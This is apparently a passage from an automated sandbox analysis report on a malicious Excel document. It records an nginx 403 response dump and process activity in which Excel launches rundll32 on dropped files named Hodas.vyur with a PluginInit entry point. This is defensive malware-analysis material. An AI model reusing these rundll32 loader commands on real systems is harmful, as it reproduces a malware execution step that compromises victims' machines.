              Apr 6, 2021 14:10:42.901468039 CEST1INHTTP/1.1 403 Forbidden
              Server: nginx
              Date: Tue, 06 Apr 2021 12:11:40 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: keep-alive
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Code Manipulations

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:14:09:32
              Start date:06/04/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13fee0000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:14:10:59
              Start date:06/04/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\Hodas.vyur,PluginInit
              Imagebase:0xff0e0000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:14:11:00
              Start date:06/04/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\Hodas.vyur1,PluginInit
              Imagebase:0xff0e0000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:14:11:00
              Start date:06/04/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\Hodas.vyur2,PluginInit
              Imagebase:0xff0e0000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis

              Reset < >